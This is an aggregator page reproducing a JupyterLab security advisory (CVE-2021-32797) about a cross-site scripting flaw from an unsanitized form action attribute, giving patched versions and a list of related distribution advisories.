Lucene search
GoogleOSV:GHSA-4952-P58Q-6CRXHistoryAug 23, 2021 - 7:40 p.m.
JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>
2021-08-2319:40:22
Google
osv.dev
48
jupyterlab
xss
form sanitization
remote code execution
patch
owasp
security advisory
guillaume jeanne
EPSS
0.004
Percentile
73.0%
Impact
Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.
Patches
Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.
References
OWASP Page on Restricting Form Submissions
For more information
If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [email protected].
Credit: Guillaume Jeanne from Google
Related
nvd
nvd
CVE-2021-32797
2021-08-09 21:15:08
osv
osv
CVE-2021-32797
2021-08-09 21:15:08
PYSEC-2021-130
2021-08-09 21:15:00
BIT-jupyterlab-2021-32797
2024-03-06 10:54:25
openvas
openvas
openSUSE: Security Advisory for python (openSUSE-SU-2022:10075-1)
2024-03-04 00:00:00
Mageia: Security Advisory (MGASA-2023-0060)
2023-03-28 00:00:00
prion
prion
Design/Logic Flaw
2021-08-09 21:15:00
nessus
nessus
openSUSE 15 Security Update : python-jupyterlab (openSUSE-SU-2022:10075-1)
2022-08-03 00:00:00
cvelist
cvelist
mageia
mageia
Updated python-jupyterlab packages fix security vulnerability
2023-02-27 23:27:16
cve
cve
CVE-2021-32797
2021-08-09 21:15:08
suse
suse
Security update for python-jupyterlab (important)
2022-08-02 00:00:00
archlinux
archlinux
[ASA-202108-10] jupyterlab: cross-site scripting
2021-08-10 00:00:00
github
github
debiancve
debiancve
CVE-2021-32797
2021-08-09 21:15:08
